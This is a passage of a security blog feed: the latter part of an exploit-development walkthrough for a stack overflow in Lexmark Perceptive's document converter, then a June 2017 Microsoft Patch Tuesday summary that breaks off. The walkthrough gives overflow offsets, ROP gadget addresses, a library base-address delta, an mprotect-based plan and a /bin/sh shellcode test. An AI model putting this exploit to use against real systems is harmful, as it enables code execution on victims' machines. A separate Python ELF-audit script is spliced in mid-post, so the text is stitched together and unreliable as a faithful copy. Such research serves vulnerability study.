/&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-JEQcAEVXq8w/WUF1P9l361I/AAAAAAAABPI/tmbOBxd4j_QGh68R4_GIrv1-w8eqaSqVgCLcBGAs/s1600/image6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="321" data-original-width="1529" height="134" src="https://3.bp.blogspot.com/-JEQcAEVXq8w/WUF1P9l361I/AAAAAAAABPI/tmbOBxd4j_QGh68R4_GIrv1-w8eqaSqVgCLcBGAs/s640/image6.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;As shown above, we ended up overwriting the original data with the "A" string right up to where the new worksheet structure starts. 
References to that structure are located in the file header, so if this data is overwritten the parser will fail.&lt;br /&gt;&lt;h3 id="h.kojh2jojm4jn"&gt;Overwriting RET Address&lt;/h3&gt;Our next step is to determine how many bytes need to be manipulated to overwrite the return address. Now we will generate a cyclic pattern using PEDA and use it instead of the string of "A"s:&lt;br /&gt;&lt;br /&gt;gdb-peda$ pattern_create&lt;br /&gt;Generate a cyclic pattern&lt;br /&gt;Set "pattern" option for basic/extended pattern type&lt;br /&gt;&lt;br /&gt;Usage:&lt;br /&gt;pattern_create size [file]&lt;br /&gt;gdb-peda$ pattern_create 0x958&lt;br /&gt;&lt;br /&gt;When we run `convert` with that modified payload we can see the following:&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-yuhNvL61IIY/WUF1U69AJ6I/AAAAAAAABPM/U5OYiPeKngsC3VjU6zYUz4ra1U_t2C1ywCLcBGAs/s1600/image15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="916" data-original-width="1462" height="400" src="https://1.bp.blogspot.com/-yuhNvL61IIY/WUF1U69AJ6I/AAAAAAAABPM/U5OYiPeKngsC3VjU6zYUz4ra1U_t2C1ywCLcBGAs/s640/image15.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Now, using the pattern_offset command, we get the offsets of the values that overwrite the RET address, and also of those that end up in some of the registers:&lt;br /&gt;&lt;br /&gt;gdb-peda$ pattern_offset HA%dA%3A%IA%eA%4A%JA&lt;br /&gt;HA%dA%3A%IA%eA%4A%JA found at offset: 264&lt;br /&gt;gdb-peda$ #EIP&lt;br /&gt;gdb-peda$ pattern_offset nA%CA%-A&lt;br /&gt;nA%CA%-A found at offset: 216&lt;br /&gt;gdb-peda$ #RBX&lt;br /&gt;gdb-peda$ pattern_offset %(A%DA%;&lt;br /&gt;%(A%DA%; found at offset: 224&lt;br /&gt;gdb-peda$ #RBP&lt;br /&gt;(...)&lt;br /&gt;&lt;br /&gt;We are able to fully control the return address by setting the value at offset 264 of our payload, and we can also fully control the initial values 
of a few registers. We can make a simple test to determine whether the offsets we found are correct:&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-IBd5udK2_Qs/WUF1bXtWYtI/AAAAAAAABPQ/A58GYnBUyqI8XmK7I65SCrPD9TNJgjdUQCLcBGAs/s1600/image8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="873" data-original-width="1539" height="362" src="https://2.bp.blogspot.com/-IBd5udK2_Qs/WUF1bXtWYtI/AAAAAAAABPQ/A58GYnBUyqI8XmK7I65SCrPD9TNJgjdUQCLcBGAs/s640/image8.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;It's clear that everything works as expected. Taking into account that the RET address overwrite sits at offset 264 and the larger part of the buffer is located after this offset, the space left for our gadgets and shellcode equals 0x958 - 264 = 0x850 (2128) bytes. This should allow us to fit all necessary values without being forced to manipulate the complicated XLS structure.&lt;br /&gt;&lt;h3 id="h.t781zvhhma1k"&gt;Building exploitation strategy&lt;/h3&gt;Before we choose one of the known methods to exploit this vulnerability we need to determine what mitigations may be implemented and used by this application and its components.&lt;br /&gt;&lt;br /&gt;To do this we are going to use checksec.sh:&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-j9g7pHxg8Yk/WUF1hNz4cZI/AAAAAAAABPU/vaCVDexHYWANHErJesiARDG-nKDxogrkACLcBGAs/s1600/image21.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="183" data-original-width="986" height="118" src="https://4.bp.blogspot.com/-j9g7pHxg8Yk/WUF1hNz4cZI/AAAAAAAABPU/vaCVDexHYWANHErJesiARDG-nKDxogrkACLcBGAs/s640/image21.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;We can see that the `convert` executable does not have ASLR support. 
The RELRO column has returned the "NO RELRO" status, which means there is a writable region of memory at a fixed address where we can store data. &lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-d5TbZN6NbTs/WUF1mMxJ-8I/AAAAAAAABPY/aT-yIrT28RY1NhsfHhF-AO6GQ0_fk2oJACLcBGAs/s1600/image19.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="75" data-original-width="950" height="50" src="https://1.bp.blogspot.com/-d5TbZN6NbTs/WUF1mMxJ-8I/AAAAAAAABPY/aT-yIrT28RY1NhsfHhF-AO6GQ0_fk2oJACLcBGAs/s640/image19.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Unfortunately, from the attacker's perspective, all components are NX-enabled, which requires us to build a ROP chain to bypass it. We also can't do a simple PLT overwrite because no interesting function is "loaded" via the PLT. We also prefer to bind this exploit to the product version rather than the platform, so we reject the GOT overwrite technique as well; binding to the product version lets the exploit work across all supported platforms. We will attempt to leverage a classic stack-based buffer overflow exploit by building a ROP chain based on the `convert` binary. The role of the ROP chain will be to make the stack executable (via a call to the mprotect syscall) and then redirect code execution flow onto the stack where our shellcode is located.&lt;br /&gt;&lt;h2 id="h.tz5g74kb2a0a"&gt;Exploitation&lt;/h2&gt;&lt;h3 id="h.o4jwm33n8lds"&gt;Finding gadgets&lt;/h3&gt;We will begin by looking for gadgets in the `convert` binary, and for this we will use `&lt;a href="https://github.com/sashs/Ropper"&gt;Ropper&lt;/a&gt;` and `&lt;a href="https://github.com/JonathanSalwan/ROPgadget"&gt;ROPgadget&lt;/a&gt;`. These two utilities differ in some small but important details of their gadget search scope. 
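The checksec step from the previous section, as an added example that is not part of the Talos write-up: a small Python audit that reads the NX, RELRO and PIE status directly from the ELF64 program headers and .dynamic table, run against ELF images constructed inline (one mirroring the `convert` profile reported above, one hardened build, one legacy object with no PT_GNU_STACK). Function and constant names are this example's own.

```python
"""ELF64 mitigation audit (NX / RELRO / PIE), in the spirit of checksec.sh.
Added example, not code from the Talos write-up. The ELF images at the bottom
are constructed here so the script runs offline without a real binary.
"""

# Constants from the ELF64 and GNU ABI specifications.
ET_EXEC, ET_DYN = 2, 3
PT_DYNAMIC = 2
PT_GNU_STACK = 0x6474E551
PT_GNU_RELRO = 0x6474E552
DT_NULL, DT_BIND_NOW, DT_FLAGS, DT_FLAGS_1 = 0, 24, 30, 0x6FFFFFFB
EHDR_SIZE, PHDR_SIZE, DYN_SIZE = 64, 56, 16


def u(data, off, size):
    """Little-endian unsigned integer of `size` bytes at offset `off`."""
    return int.from_bytes(data[off:off + size], "little")


def bit(value, n):
    """True when bit n of value is set."""
    return (value >> n) % 2 == 1


def dynamic_has_bind_now(data, offset, size):
    """Scan the .dynamic table for the tags that turn partial RELRO into full RELRO."""
    for pos in range(offset, offset + size, DYN_SIZE):
        tag, val = u(data, pos, 8), u(data, pos + 8, 8)
        if tag == DT_NULL:
            break
        if tag == DT_BIND_NOW:
            return True
        if tag == DT_FLAGS and bit(val, 3):      # DF_BIND_NOW = 0x8
            return True
        if tag == DT_FLAGS_1 and bit(val, 0):    # DF_1_NOW = 0x1
            return True
    return False


def elf_mitigations(data):
    """Return {'nx': bool, 'relro': 'No' / 'Partial' / 'Full', 'pie': bool}."""
    if data[:4] != b"\x7fELF" or data[4] != 2:   # e_ident[EI_CLASS] 2 == ELFCLASS64
        raise ValueError("not an ELF64 image")
    e_type = u(data, 16, 2)
    e_phoff = u(data, 32, 8)
    e_phentsize = u(data, 54, 2)
    e_phnum = u(data, 56, 2)
    stack_exec = True        # Linux default when PT_GNU_STACK is absent
    has_relro = bind_now = False
    for i in range(e_phnum):
        ph = e_phoff + i * e_phentsize
        p_type, p_flags = u(data, ph, 4), u(data, ph + 4, 4)
        p_offset, p_filesz = u(data, ph + 8, 8), u(data, ph + 32, 8)
        if p_type == PT_GNU_STACK:
            stack_exec = bit(p_flags, 0)         # PF_X is bit 0
        elif p_type == PT_GNU_RELRO:
            has_relro = True
        elif p_type == PT_DYNAMIC:
            bind_now = dynamic_has_bind_now(data, p_offset, p_filesz)
    relro = "Full" if has_relro and bind_now else "Partial" if has_relro else "No"
    # ET_DYN means position-independent code; note a shared library is ET_DYN as well.
    return {"nx": not stack_exec, "relro": relro, "pie": e_type == ET_DYN}


def p(value, size):
    return value.to_bytes(size, "little")


def build_elf(e_type, gnu_stack_flags, relro, dyn_tags):
    """Assemble a constructed, non-loadable ELF64 image with just enough structure
    for the audit: header, program headers, .dynamic table.
    gnu_stack_flags=None omits PT_GNU_STACK entirely."""
    dyn = b"".join(p(t, 8) + p(v, 8) for t, v in dyn_tags) + p(DT_NULL, 8) + p(0, 8)
    n_ph = 1 + (1 if gnu_stack_flags is not None else 0) + (1 if relro else 0)
    dyn_off = EHDR_SIZE + n_ph * PHDR_SIZE

    def phdr(p_type, p_flags, p_offset, p_filesz):
        return (p(p_type, 4) + p(p_flags, 4) + p(p_offset, 8) + p(0, 8) + p(0, 8)
                + p(p_filesz, 8) + p(p_filesz, 8) + p(8, 8))

    phdrs = phdr(PT_DYNAMIC, 6, dyn_off, len(dyn))
    if gnu_stack_flags is not None:
        phdrs += phdr(PT_GNU_STACK, gnu_stack_flags, 0, 0)
    if relro:
        phdrs += phdr(PT_GNU_RELRO, 4, 0, 0)
    ident = b"\x7fELF" + bytes([2, 1, 1]) + bytes(9)   # ELFCLASS64, LSB, version 1
    ehdr = (ident + p(e_type, 2) + p(62, 2) + p(1, 4) + p(0, 8) + p(EHDR_SIZE, 8)
            + p(0, 8) + p(0, 4) + p(EHDR_SIZE, 2) + p(PHDR_SIZE, 2) + p(n_ph, 2)
            + p(0, 2) + p(0, 2) + p(0, 2))
    return ehdr + phdrs + dyn


# Constructed profiles: the first mirrors what checksec reported for `convert`
# (NX enabled, NO RELRO, no PIE), the second is a hardened build, the third a legacy
# object with no PT_GNU_STACK, which the kernel maps with an executable stack.
CONVERT_LIKE = build_elf(ET_EXEC, gnu_stack_flags=6, relro=False, dyn_tags=[])
HARDENED = build_elf(ET_DYN, gnu_stack_flags=6, relro=True, dyn_tags=[(DT_FLAGS_1, 1)])
LEGACY = build_elf(ET_EXEC, gnu_stack_flags=None, relro=False, dyn_tags=[])

if __name__ == "__main__":
    for name, image in (("convert-like", CONVERT_LIKE), ("hardened", HARDENED), ("legacy", LEGACY)):
        print(f"{name:13} {elf_mitigations(image)}")
```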
We will start by looking for the most important gadget: the syscall instruction.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-RFeoKQaTk9M/WUF1sCP6P9I/AAAAAAAABPc/Vk_pVMTwUicU0RMKN8lhbDv_zT6w2vBEQCLcBGAs/s1600/image16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="95" data-original-width="842" height="72" src="https://2.bp.blogspot.com/-RFeoKQaTk9M/WUF1sCP6P9I/AAAAAAAABPc/Vk_pVMTwUicU0RMKN8lhbDv_zT6w2vBEQCLcBGAs/s640/image16.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Unfortunately, it looks like the syscall gadget is missing, so we will need to determine how to proceed. We will look one more time at the state of the registers when we obtain control of the code execution flow.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-4AMyuLffu-g/WUF1wWeydZI/AAAAAAAABPg/lsvLWHP0rsEVPctMHU1XcECHL_avALB3ACLcBGAs/s1600/image12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="1011" data-original-width="1156" height="558" src="https://4.bp.blogspot.com/-4AMyuLffu-g/WUF1wWeydZI/AAAAAAAABPg/lsvLWHP0rsEVPctMHU1XcECHL_avALB3ACLcBGAs/s640/image12.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;The RAX register points to a pointer which points inside the code section of the `libISYSreadershd.so` library. This library has ASLR support, but since the register points into its code we can calculate a fixed delta: &lt;br /&gt;&lt;br /&gt;0x7ffff375dfb0 (VALUE_AVAILABLE_IN_RAX) - 0x7ffff34cf000 (IMAGE_BASE) = 0x28efb0 (delta). The delta will be used later in our ROP chain to obtain the current image base of the `libISYSreadershd.so` module. By having the image base we can easily use gadgets from this library. 
If we look at the size of this library and compare it to the `convert` binary:&lt;br /&gt;&lt;br /&gt;-rwxr-xr-x 3 icewall icewall 182K May  5 18:21 convert&lt;br /&gt;-rwxr-xr-x 3 icewall icewall  12M May  5 18:21 libISYSreadershd.so&lt;br /&gt;&lt;br /&gt;Twelve megabytes looks more promising as a source of gadgets. A quick look for the "syscall" gadget this time ends with success:&lt;br /&gt;&lt;br /&gt;icewall@ubuntu:~/exploits/cvtisys$ ~/tools/Ropper/Ropper.py --file libISYSreadershd.so --search "syscall"&lt;br /&gt;[INFO] Load gadgets from cache&lt;br /&gt;[LOAD] loading... 100%&lt;br /&gt;[LOAD] removing double gadgets... 100%&lt;br /&gt;[INFO] Searching for gadgets: syscall&lt;br /&gt;[INFO] File: libISYSreadershd.so&lt;br /&gt;(...)&lt;br /&gt;&lt;br /&gt;0x000000000096a0dd: syscall; ret;&lt;br /&gt;(...)&lt;br /&gt;&lt;br /&gt;Ok, we are ready to start looking for interesting gadgets that will help us set registers, read and write memory, and perform other tasks.&lt;br /&gt;&lt;br /&gt;&lt;h3 id="h.qw7cawyfntl7"&gt;Grouping gadgets&lt;/h3&gt;It's important to note that the `Ropper` utility does not show gadgets ending with the `retf` instruction, as noted by the &lt;a href="https://github.com/sashs/Ropper/blob/038da32ca53bebff0dd77300a7134ca1138c0f80/ropper/arch.py%23L162"&gt;author&lt;/a&gt;. This is notable because, with a limited number of gadgets, each of them can be key. That's why it's good to search our binaries with different types of tools before we look for gadgets.&lt;br /&gt;&lt;br /&gt;Since it's not a capture the flag (CTF) challenge, finding all necessary gadgets can be problematic, especially at the first stage where we are limited to the small `convert` executable file. My methodology is to have a clear picture of the gadgets that we already have and determine what the connections are between them. The first step is to group them into categories. 
&lt;br /&gt;&lt;br /&gt;QWORD write&lt;br /&gt;===============&lt;br /&gt;0x0000000000415253: mov qword ptr [rbp - 0x50], rax; call qword ptr [rbx + 0x10];&lt;br /&gt;(...)&lt;br /&gt;&lt;br /&gt;QWORD read&lt;br /&gt;==============&lt;br /&gt;0x0000000000409ad0: mov rdx, qword ptr [rax]; mov rdi, rax; call qword ptr [rdx + 0x30];&lt;br /&gt;(...)&lt;br /&gt;&lt;br /&gt;SET register&lt;br /&gt;===============&lt;br /&gt;0x000000000041bf04: pop rax; ret;&lt;br /&gt;0x000000000041bff1: pop rbx; ret;&lt;br /&gt;0x0000000000409ad3: mov rdi, rax; call qword ptr [rdx + 0x30];&lt;br /&gt;(...)&lt;br /&gt;&lt;br /&gt;DEC DWORD PTR&lt;br /&gt;==================&lt;br /&gt;0x000000000042121f: dec dword ptr [rdi]; ret;&lt;br /&gt;(...)&lt;br /&gt;&lt;br /&gt;ADD reg to DWORD ptr&lt;br /&gt;=======================&lt;br /&gt;0x000000000040d0e3: add dword ptr [rax - 0x77], ecx; ret;&lt;br /&gt;(...)&lt;br /&gt;&lt;br /&gt;ADD DWORD ptr to reg&lt;br /&gt;=====================&lt;br /&gt;0x0000000000409416: add ecx, dword ptr [rax - 0x77]; ret;&lt;br /&gt;(...)&lt;br /&gt;&lt;br /&gt;That's of course just a part of discovering interesting gadgets, but hopefully it demonstrates the advantages of grouping gadgets this way before attempting to create a proper ROP chain.&lt;br /&gt;&lt;h3 id="h.il0bcdsblph8"&gt;Preparing ROP class and primitives&lt;/h3&gt;We have collected as many ROP gadgets as we could from the different categories; now we wrap them in convenient primitives so that building the final ROP chain will be much easier.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-h-hZenqoprE/WUF11QZD15I/AAAAAAAABPk/K4XBqXYaNWYGm7fsZtWPRj9l8F6sy5_iQCLcBGAs/s1600/image2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="672" data-original-width="1125" height="382" 
src="https://1.bp.blogspot.com/-h-hZenqoprE/WUF11QZD15I/AAAAAAAABPk/K4XBqXYaNWYGm7fsZtWPRj9l8F6sy5_iQCLcBGAs/s640/image2.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Now we will begin the process of building the ROP chain.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-GSl2jgoBr7E/WUF16DBmXSI/AAAAAAAABPo/HtjSA3bUFPUbER6NLAtLjzOFWOaKopr0gCLcBGAs/s1600/image17.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="542" data-original-width="857" height="404" src="https://2.bp.blogspot.com/-GSl2jgoBr7E/WUF16DBmXSI/AAAAAAAABPo/HtjSA3bUFPUbER6NLAtLjzOFWOaKopr0gCLcBGAs/s640/image17.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;It's worth noting that we abuse the previously mentioned fact that the section headers memory area in the `convert` binary stays writable and is located at a fixed address (see the "NO RELRO" result from checksec). As you can see, we start using this memory area right at the beginning of our ROP chain. Some of the gadgets we managed to find (e.g. writeEAX) will require the preparation of a "ROP pointers" table, because they end in an indirect call such as:&lt;br /&gt;&lt;br /&gt;call [reg + xx]&lt;br /&gt;&lt;br /&gt;To be able to use them we need to prepare a "ROP pointers" table, and this memory area is perfect for accomplishing this task. 
Below is an example of its layout after the execution of a couple of ROP gadgets.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-dAWwORpHWno/WUF1-QLGzMI/AAAAAAAABPs/q5Zg9seLH-UxnM4VWq7e-3kDQJNMH4G1ACLcBGAs/s1600/image18.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="185" data-original-width="545" height="216" src="https://2.bp.blogspot.com/-dAWwORpHWno/WUF1-QLGzMI/AAAAAAAABPs/q5Zg9seLH-UxnM4VWq7e-3kDQJNMH4G1ACLcBGAs/s640/image18.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;h3 id="h.ooxmvq8smf71"&gt;Road map&lt;/h3&gt;The remaining steps for creating this ROP chain are straightforward:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Dereference the address available in RAX twice to get the address pointing to the libISYSreadershd code section&lt;/li&gt;&lt;li&gt;Subtract the delta from this address to obtain the libISYSreadershd IMAGE BASE&lt;/li&gt;&lt;li&gt;Once we have the libISYSreadershd IMAGE BASE we can start using gadgets from this library&lt;/li&gt;&lt;li&gt;Call the mprotect syscall&lt;/li&gt;&lt;li&gt;The stack is executable, time to redirect code execution to our shellcode&lt;/li&gt;&lt;li&gt;P0wn3d!!!&lt;/li&gt;&lt;/ul&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-zJsVG2vACFA/WUF2C05aHBI/AAAAAAAABPw/_cCJwWgiV9gRJKPDaGpcDzUvOMyyxBSbwCLcBGAs/s1600/image9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="671" data-original-width="703" height="610" src="https://4.bp.blogspot.com/-zJsVG2vACFA/WUF2C05aHBI/AAAAAAAABPw/_cCJwWgiV9gRJKPDaGpcDzUvOMyyxBSbwCLcBGAs/s640/image9.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h3 id="h.pb6kga78ejc2"&gt;Shellcode and first tests&lt;/h3&gt;The first step is determining how much space is left in the buffer for our shellcode.&lt;br /&gt;&lt;br /&gt;&lt;div 
class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-QWp0IR2uokM/WUF2O2I-YfI/AAAAAAAABP0/Yx70Bik_Xi0XX8s7mA55Gc4BiiVhUxn-gCLcBGAs/s1600/image11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="260" data-original-width="593" height="280" src="https://2.bp.blogspot.com/-QWp0IR2uokM/WUF2O2I-YfI/AAAAAAAABP0/Yx70Bik_Xi0XX8s7mA55Gc4BiiVhUxn-gCLcBGAs/s640/image11.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;As you can see in the above image, there are 136 bytes left over. For testing purposes we will use some simple "/bin/sh" shellcode that takes only 27 bytes. Finally, adding the shellcode to our ROP chain allows us to test our exploit:&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-2pFkBXfZKhM/WUF2TeLdDyI/AAAAAAAABP4/TlC1kpWNWuINWq4yCGqqgNK_8UdoAWbKQCLcBGAs/s1600/image7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="167" data-original-width="1192" height="88" src="https://1.bp.blogspot.com/-2pFkBXfZKhM/WUF2TeLdDyI/AAAAAAAABP4/TlC1kpWNWuINWq4yCGqqgNK_8UdoAWbKQCLcBGAs/s640/image7.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;Success!&lt;br /&gt;&lt;h3 id="h.l7dcoy3ljtua"&gt;Conclusion&lt;/h3&gt;This deep dive provides a glimpse into the process of taking a vulnerability and weaponizing it into a usable exploit. This process starts with the identification of the vulnerability and additional research into ways that it could potentially be leveraged. Finally, a deeper analysis of the environment surrounding the vulnerability is required, including mapping the address space, identifying and grouping gadgets, and finally building the ROP chain and attaching the malicious shellcode to complete the exploitation.&lt;br /&gt;&lt;br /&gt;There is a key differentiation between vulnerability discovery and analysis. 
Just because a vulnerability exists does not mean it is easily weaponized. In most circumstances the path to weaponization is a long, difficult, and complicated process. However, this also significantly increases the value of the vulnerability, depending on the methodology required to actually exploit it.&lt;br /&gt;&lt;br /&gt;&lt;div class="feedflare"&gt;
&lt;/div&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2017-06-15T10:41:02.340-04:00</atom:updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img.youtube.com/vi/ilABOvr3wPg/default.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.talosintelligence.com/2017/06/lexmark-perceptive-vuln-deep-dive.html</feedburner:origLink></item><item><title>Microsoft Patch Tuesday  - June 2017</title><link>http://feedproxy.google.com/~r/feedburner/Talos/~3/FtF1o6PBkRM/ms-tuesday.html</link><category>Coverage</category><category>Microsoft</category><category>ms tuesday</category><category>patch tuesday</category><category>Snort Rules</category><author>noreply@blogger.com (Nick Biasini)</author><pubDate>Tue, 13 Jun 2017 13:48:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1029833275466591797.post-6245805237918382457</guid><description>Today, Microsoft has released their monthly set of security updates designed to address vulnerabilities. This month's release addresses 92 vulnerabilities with 17 of them rated critical and 75 rated important. Impacted products include Edge, Internet Explorer, Office, Sharepoint, Skype for Business, Lync, and Windows.&lt;br /&gt;&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;h3 id="h.hv5a65yfsbxp"&gt;Vulnerabilities Rated Critical&lt;/h3&gt;&lt;h4 id="h.wfa2xeyn8j0o"&gt;CVE-2017-0283&lt;/h4&gt;This is a remote code execution vulnerability in Windows Uniscribe related to improper handling of objects in memory. The attack can result in the attacker gaining full control of the affected system. 
This can be exploited through multiple vectors, including viewing a specially crafted website or a user opening a specially crafted document file.&lt;br /&gt;&lt;h4 id="h.pd0tltwr72p2"&gt;CVE-2017-0291 / CVE-2017-0292&lt;/h4&gt;These are remote code execution vulnerabilities in Microsoft Windows that are triggered if a user opens a specially crafted PDF file. The attack results in potential arbitrary code execution in the context of the current user and can be exploited by having the user open a specially crafted PDF file.&lt;br /&gt;&lt;h4 id="h.hv36855sqvlr"&gt;CVE-2017-0294&lt;/h4&gt;This is a remote code execution vulnerability in Microsoft Windows related to the failure to properly handle cabinet files. This is exploitable by an attacker having a user open a specially crafted cabinet file, or by spoofing a network printer and tricking the user into installing a malicious cabinet file disguised as a printer driver.&lt;br /&gt;&lt;h4 id="h.diewipjyn91o"&gt;CVE-2017-8464&lt;/h4&gt;This is a remote code execution vulnerability related to the way that Windows Explorer handles LNK files. This vulnerability can be triggered if the icon of a specially crafted shortcut is displayed.&lt;br /&gt;&lt;h4 id="h.wbb780pr8m8i"&gt;CVE-2017-8496 / CVE-2017-8497&lt;/h4&gt;These are remote code execution vulnerabilities in Microsoft's Edge browser related to improper access of objects in memory. The resulting memory corruption can result in arbitrary code execution. These can be exploited by a user visiting a specially crafted website.&lt;br /&gt;&lt;h4 id="h.1z06wiwr79tf"&gt;CVE-2017-8499&lt;/h4&gt;This is a remote code execution vulnerability in the Microsoft Edge JavaScript scripting engine related to the improper handling of objects in memory. The resulting memory corruption could result in arbitrary code execution. 
This can be exploited by having a user view a specially crafted website.&lt;br /&gt;&lt;h4 id="h.i1b4odd02i18"&gt;CVE-2017-8517&lt;/h4&gt;This is a remote code execution vulnerability in the JavaScript engine in Microsoft browsers related to improper handling of objects in memory. Exploitation can occur through a specially crafted website, resulting in the attacker gaining full control of the affected system.&lt;br /&gt;&lt;h4 id="h.3l2zoggepikn"&gt;CVE-2017-8520&lt;/h4&gt;This is a remote code execution vulnerability in the Microsoft Edge JavaScript scripting engine related to the way the engine handles objects in memory. The resulting corruption of memory can result in arbitrary code execution. This can be exploited by a user visiting a specially crafted webpage.&lt;br /&gt;&lt;h4 id="h.hirfaaudj8y2"&gt;CVE-2017-8522&lt;/h4&gt;This is a remote code execution vulnerability in the way the JavaScript engines in Microsoft browsers, including both Internet Explorer and Edge, render content when handling objects in memory. This can be exploited by a user visiting a specially crafted webpage.&lt;br /&gt;&lt;h4 id="h.xpxmg2ydkif2"&gt;CVE-2017-8524&lt;/h4&gt;This is a remote code execution vulnerability in the JavaScript engines in Microsoft browsers related to improper handling of objects in memory. Exploitation can occur through the viewing of a specially crafted website and can result in the attacker gaining the same user rights as the current user.&lt;br /&gt;&lt;h4 id="h.j0uggxwjmgay"&gt;CVE-2017-8527&lt;/h4&gt;This is a remote code execution vulnerability in the Windows font library related to improper handling of specially crafted embedded fonts. There are multiple ways this vulnerability can be exploited, including viewing a specially crafted website or opening a specially crafted document.&lt;br /&gt;&lt;h4 id="h.a2u2lz7ol3bu"&gt;CVE-2017-8528&lt;/h4&gt;This is a remote code execution vulnerability in Windows Uniscribe related to improper handling of objects in memory. 
There are multiple ways this vulnerability can be exploited, including viewing a specially crafted website or opening a specially crafted document.&lt;br /&gt;&lt;h4 id="h.bx2hk4byyp0"&gt;CVE-2017-8543&lt;/h4&gt;This is a remote code execution vulnerability in Windows Search related to the improper handling of objects in memory. This can be exploited by an attacker sending a specially crafted SMB message to the Windows Search service.&lt;br /&gt;&lt;h4 id="h.pdkn0478ls9v"&gt;CVE-2017-8548 / CVE-2017-8549&lt;/h4&gt;These are remote code execution vulnerabilities in the JavaScript engines of Microsoft browsers related to improper handling of objects in memory. They can be exploited by having a user view a specially crafted website.&lt;br /&gt;&lt;h3 id="h.gpoya8yq4g7y"&gt;Vulnerabilities Rated as Important&lt;/h3&gt;&lt;h4 id="h.2bzwegrsdvuh"&gt;CVE-2017-0173 / CVE-2017-0215 / CVE-2017-0216 / CVE-2017-0218 / CVE-2017-0219&lt;/h4&gt;These are security feature bypass vulnerabilities in Device Guard that could allow an attacker to inject malicious code into a Windows PowerShell session. They can be exploited by an attacker with access to a local machine injecting malicious code into a script that is trusted by the Code Integrity policy.&lt;br /&gt;&lt;h4 id="h.fbwxsdtpm92q"&gt;CVE-2017-0193&lt;/h4&gt;This is a privilege escalation vulnerability in Windows Hyper-V instruction emulation related to improper privilege level enforcement. This vulnerability could be combined with another vulnerability to take advantage of the elevated privileges while running.&lt;br /&gt;&lt;h4 id="h.e4h7wyh0j9ao"&gt;CVE-2017-0260 / CVE-2017-8506&lt;/h4&gt;These are remote code execution vulnerabilities in Microsoft Office related to improper input validation prior to loading dynamic link library (DLL) files. 
